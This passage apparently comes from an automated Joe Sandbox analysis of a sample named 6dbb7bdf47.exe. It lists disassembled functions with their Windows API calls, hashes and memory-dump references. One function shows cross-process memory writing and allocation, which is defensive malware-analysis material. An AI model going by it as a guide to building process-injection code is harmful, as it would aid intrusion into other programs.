                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: c0ecd882c7da464e99f71c7aa53d45295ddc0d2addbf040ae7fbb168e4c2c128
                                                        • Instruction ID: 08ce4c81a246a881c19995f9dc7001ba0ffbc55216c782a073e7e28125ed34c4
                                                        • Opcode Fuzzy Hash: c0ecd882c7da464e99f71c7aa53d45295ddc0d2addbf040ae7fbb168e4c2c128
                                                        • Instruction Fuzzy Hash: C0F04F35101311AFD7214FA5AC8DF563BAEEF8A762F604854F949E6291CA70DC448B70
                                                        Function 00E51014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E5102A
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E51036
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E51045
                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E5104C
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E51062
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 177721459173eb8ebb79b782b5d83745aaefd7319602b3dcf9a1956b80f00de2
                                                        • Instruction ID: 57c3bc974a032539f5270d2467e8bad4cfd6fce7f9cbe79859a60d8e1e71f9c4
                                                        • Opcode Fuzzy Hash: 177721459173eb8ebb79b782b5d83745aaefd7319602b3dcf9a1956b80f00de2
                                                        • Instruction Fuzzy Hash: C3F04F35101311AFD7215FA5EC49F563B6DEF8A7A1F200854F949E6290CA70D8449B70
                                                        Function 00E6030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNEL32(?,?,?,?,00E6017D,?,00E632FC,?,00000001,00E32592,?), ref: 00E60324
                                                        • CloseHandle.KERNEL32(?,?,?,?,00E6017D,?,00E632FC,?,00000001,00E32592,?), ref: 00E60331
                                                        • CloseHandle.KERNEL32(?,?,?,?,00E6017D,?,00E632FC,?,00000001,00E32592,?), ref: 00E6033E
                                                        • CloseHandle.KERNEL32(?,?,?,?,00E6017D,?,00E632FC,?,00000001,00E32592,?), ref: 00E6034B
                                                        • CloseHandle.KERNEL32(?,?,?,?,00E6017D,?,00E632FC,?,00000001,00E32592,?), ref: 00E60358
                                                        • CloseHandle.KERNEL32(?,?,?,?,00E6017D,?,00E632FC,?,00000001,00E32592,?), ref: 00E60365
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 73ce19286abc63d7f22cd73a7cb0d4207004efeb5b51b00af1c120cfd5725586
                                                        • Instruction ID: 207f3cb04fded3d00ff04c1298c80d4a3d4b8ddf3e9b9f0302b4acbae24c967e
                                                        • Opcode Fuzzy Hash: 73ce19286abc63d7f22cd73a7cb0d4207004efeb5b51b00af1c120cfd5725586
                                                        • Instruction Fuzzy Hash: 85019072840B259FC7319F66E880813F7F5BF6025A3159A3ED19662A31C371A959DF80
                                                        Function 00E2D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00E2D752
                                                          • Part of subcall function 00E229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2D7D1,00000000,00000000,00000000,00000000,?,00E2D7F8,00000000,00000007,00000000,?,00E2DBF5,00000000), ref: 00E229DE
                                                          • Part of subcall function 00E229C8: GetLastError.KERNEL32(00000000,?,00E2D7D1,00000000,00000000,00000000,00000000,?,00E2D7F8,00000000,00000007,00000000,?,00E2DBF5,00000000,00000000), ref: 00E229F0
                                                        • _free.LIBCMT ref: 00E2D764
                                                        • _free.LIBCMT ref: 00E2D776
                                                        • _free.LIBCMT ref: 00E2D788
                                                        • _free.LIBCMT ref: 00E2D79A
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 4a471266d5024770286ee99a5efff289a4ba4c0b8c464c8fd4d9d77c91ee7472
                                                        • Instruction ID: 74d5ad5ac93d827a831bfaa47ce002d59bebd8651d5665f1dadb103e71af296c
                                                        • Opcode Fuzzy Hash: 4a471266d5024770286ee99a5efff289a4ba4c0b8c464c8fd4d9d77c91ee7472
                                                        • Instruction Fuzzy Hash: 60F0FF32548224AB9625EB65FDC5C1777DDBB887147E42D0AF248F7501C724FC808664
                                                        Function 00E55C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00E55C58
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E55C6F
                                                        • MessageBeep.USER32(00000000), ref: 00E55C87
                                                        • KillTimer.USER32(?,0000040A), ref: 00E55CA3
                                                        • EndDialog.USER32(?,00000001), ref: 00E55CBD
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: f011075179f2761a3a3e98191e4b26b446eaf47d705d7cae59d0100edd60bc4d
                                                        • Instruction ID: dc09006d31e47db9d9ca7119f240aafae4685c3a877d86bfdeb30806ba36ab80
                                                        • Opcode Fuzzy Hash: f011075179f2761a3a3e98191e4b26b446eaf47d705d7cae59d0100edd60bc4d
                                                        • Instruction Fuzzy Hash: 6C018B315007049FEB205B11DD5EFA5B7B8BF01B06F041569A657714E1E7F0998C9F60
                                                        Function 00E222A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00E222BE
                                                          • Part of subcall function 00E229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2D7D1,00000000,00000000,00000000,00000000,?,00E2D7F8,00000000,00000007,00000000,?,00E2DBF5,00000000), ref: 00E229DE
                                                          • Part of subcall function 00E229C8: GetLastError.KERNEL32(00000000,?,00E2D7D1,00000000,00000000,00000000,00000000,?,00E2D7F8,00000000,00000007,00000000,?,00E2DBF5,00000000,00000000), ref: 00E229F0
                                                        • _free.LIBCMT ref: 00E222D0
                                                        • _free.LIBCMT ref: 00E222E3
                                                        • _free.LIBCMT ref: 00E222F4
                                                        • _free.LIBCMT ref: 00E22305
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 00c80f27028bb70d415cd307420a356f7ef2f718bc8b9950c7e24c5da770cd3d
                                                        • Instruction ID: b6ff29ecf10d064b189fadbdaf32fb9f83db920b70c68bbd7f244bae60221135
                                                        • Opcode Fuzzy Hash: 00c80f27028bb70d415cd307420a356f7ef2f718bc8b9950c7e24c5da770cd3d
                                                        • Instruction Fuzzy Hash: 01F0BE75804130EF8616AF56BC01C097BA4FB1D761741226EF120F23B2C732188AAFE4
                                                        Function 00E095C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 00E095D4
                                                        • StrokeAndFillPath.GDI32(?,?,00E471F7,00000000,?,?,?), ref: 00E095F0
                                                        • SelectObject.GDI32(?,00000000), ref: 00E09603
                                                        • DeleteObject.GDI32 ref: 00E09616
                                                        • StrokePath.GDI32(?), ref: 00E09631
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: 20d6d59007c07ea5076c49edac44a089f0eaf3bf5d35898e5f7f6f24b99c1712
                                                        • Instruction ID: 7e08dddfa4d3b17bb597a66a0101ea513e9f2009be97119728e1214cbfd88b5f
                                                        • Opcode Fuzzy Hash: 20d6d59007c07ea5076c49edac44a089f0eaf3bf5d35898e5f7f6f24b99c1712
                                                        • Instruction Fuzzy Hash: BAF01D30006604DFD7525F57ED1CB683B61A7523A6F148264F419750F3C732459ADF20
                                                        Function 00E20F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: __freea$_free
                                                        • String ID: a/p$am/pm
                                                        • API String ID: 3432400110-3206640213
                                                        • Opcode ID: 92ce6352bb39b661eea1541dcecc43f8d156237081cf78e51d127697eb84c87e
                                                        • Instruction ID: ede2aae66f1dd3d8b66b1b170d02c931132877fdbf1abd830bb625fb38de1f33
                                                        • Opcode Fuzzy Hash: 92ce6352bb39b661eea1541dcecc43f8d156237081cf78e51d127697eb84c87e
                                                        • Instruction Fuzzy Hash: 6FD12531900266DADB24CF68E845BFEB7B2FF25304F292199E501BB650D3759F81CB91
                                                        Function 00E761D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E10242: EnterCriticalSection.KERNEL32(00EC070C,00EC1884,?,?,00E0198B,00EC2518,?,?,?,00DF12F9,00000000), ref: 00E1024D
                                                          • Part of subcall function 00E10242: LeaveCriticalSection.KERNEL32(00EC070C,?,00E0198B,00EC2518,?,?,?,00DF12F9,00000000), ref: 00E1028A
                                                          • Part of subcall function 00E100A3: __onexit.LIBCMT ref: 00E100A9
                                                        • __Init_thread_footer.LIBCMT ref: 00E76238
                                                          • Part of subcall function 00E101F8: EnterCriticalSection.KERNEL32(00EC070C,?,?,00E08747,00EC2514), ref: 00E10202
                                                          • Part of subcall function 00E101F8: LeaveCriticalSection.KERNEL32(00EC070C,?,00E08747,00EC2514), ref: 00E10235
                                                          • Part of subcall function 00E6359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00E635E4
                                                          • Part of subcall function 00E6359C: LoadStringW.USER32(00EC2390,?,00000FFF,?), ref: 00E6360A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                        • String ID: x#$x#$x#
                                                        • API String ID: 1072379062-1894725482
                                                        • Opcode ID: 827738bb7fc3a2da33efe2201dbf9f06d45b2483b4e9a5e5919e63731d6a1d12
                                                        • Instruction ID: 9633f6025959600bb2a3a62cef420cae69158ebaec1a0765c492b5b4d85fb357
                                                        • Opcode Fuzzy Hash: 827738bb7fc3a2da33efe2201dbf9f06d45b2483b4e9a5e5919e63731d6a1d12
                                                        • Instruction Fuzzy Hash: 38C18071A00509AFCB14DF98C891EBEB7B9FF48304F149429FA19AB291DB70ED45CB60
                                                        Function 00E28A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00E28B6E
                                                        • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00E28B7A
                                                        • __dosmaperr.LIBCMT ref: 00E28B81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                        • String ID: .
                                                        • API String ID: 2434981716-3963672497
                                                        • Opcode ID: 9c04bd31bb43f0b3810a93f717826f37c4281d31b890c74c162593089ce48087
                                                        • Instruction ID: fb993521df4985e7f8863887f391a558a60e79d981455a3ab63cb87ba02bec5b
                                                        • Opcode Fuzzy Hash: 9c04bd31bb43f0b3810a93f717826f37c4281d31b890c74c162593089ce48087
                                                        • Instruction Fuzzy Hash: A141BDB4605065AFDB249F24ED80ABD3FE5DF46304F2861AEF495B7652DE31CC028790
                                                        Function 00E52716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E5B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E521D0,?,?,00000034,00000800,?,00000034), ref: 00E5B42D
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E52760
                                                          • Part of subcall function 00E5B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E521FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00E5B3F8
                                                          • Part of subcall function 00E5B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00E5B355
                                                          • Part of subcall function 00E5B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E52194,00000034,?,?,00001004,00000000,00000000), ref: 00E5B365
                                                          • Part of subcall function 00E5B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E52194,00000034,?,?,00001004,00000000,00000000), ref: 00E5B37B
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E527CD
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E5281A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @
                                                        • API String ID: 4150878124-2766056989
                                                        • Opcode ID: c3a3d9e2f22b2da37c206fd710871834fa5dc4189308a269c9f946a68544fb87
                                                        • Instruction ID: 0199ae6632caa36b5e772e02e7cb478cdefdfab7c97fefebce115c3e34ea0772
                                                        • Opcode Fuzzy Hash: c3a3d9e2f22b2da37c206fd710871834fa5dc4189308a269c9f946a68544fb87
                                                        • Instruction Fuzzy Hash: AD414E76900218BFDB10DFA4CD81AEEBBB8EF09700F105459FA55B7181DB706E49CBA1
                                                        Function 00E2172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user~1\AppData\Local\Temp\1000019101\6dbb7bdf47.exe,00000104), ref: 00E21769
                                                        • _free.LIBCMT ref: 00E21834
                                                        • _free.LIBCMT ref: 00E2183E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _free$FileModuleName
                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\1000019101\6dbb7bdf47.exe
                                                        • API String ID: 2506810119-1140124489
                                                        • Opcode ID: 51fce76d854f6b3277868dc60d462f1ee2a03aecb0ff81c47b2be8295d0cc86a
                                                        • Instruction ID: eb823e5be7a4d1e696e0f7dcf285f6f9cfe7710c93015d15084896e06f04d554
                                                        • Opcode Fuzzy Hash: 51fce76d854f6b3277868dc60d462f1ee2a03aecb0ff81c47b2be8295d0cc86a
                                                        • Instruction Fuzzy Hash: 6931A475A00268AFCB25DF99EC81D9EBBFCEB96310B1051E6F404B7211D6718F40DB90
                                                        Function 00E5C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E5C306
                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00E5C34C
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EC1990,01044868), ref: 00E5C395
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem
                                                        • String ID: 0
                                                        • API String ID: 135850232-4108050209
                                                        • Opcode ID: 86e1da0b706d0193fcbc7a5190310f0e276104e0baac1e6b2ae435f0a1877eaa
                                                        • Instruction ID: 845433ee875e39b2b8481ea3fd5bdd05489ce02346b43253308395b470ee65a0
                                                        • Opcode Fuzzy Hash: 86e1da0b706d0193fcbc7a5190310f0e276104e0baac1e6b2ae435f0a1877eaa
                                                        • Instruction Fuzzy Hash: D441E3312043059FD720DF25D894B5ABBE4EF85315F209A6DFDA5A72D1D730E908CB62
                                                        Function 00E84416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E8CC08,00000000,?,?,?,?), ref: 00E844AA
                                                        • GetWindowLongW.USER32 ref: 00E844C7
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E844D7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        • Opcode ID: 21f00f9b5372c790064400fe195213e37c38287fc3537c5f324d3db7463fcaa7
                                                        • Instruction ID: 306e65ed40b8f573df2d91b4ff8be20b0aeff1a60f372eaee7c871edbc2f1de0
                                                        • Opcode Fuzzy Hash: 21f00f9b5372c790064400fe195213e37c38287fc3537c5f324d3db7463fcaa7
                                                        • Instruction Fuzzy Hash: FC318D71210206AFDB21AF78DC45BEA7BA9EB09338F205725F97DA21E1D770EC509760
                                                        Function 00E56E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SysReAllocString.OLEAUT32(?,?), ref: 00E56EED
                                                        • VariantCopyInd.OLEAUT32(?,?), ref: 00E56F08
                                                        • VariantClear.OLEAUT32(?), ref: 00E56F12
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
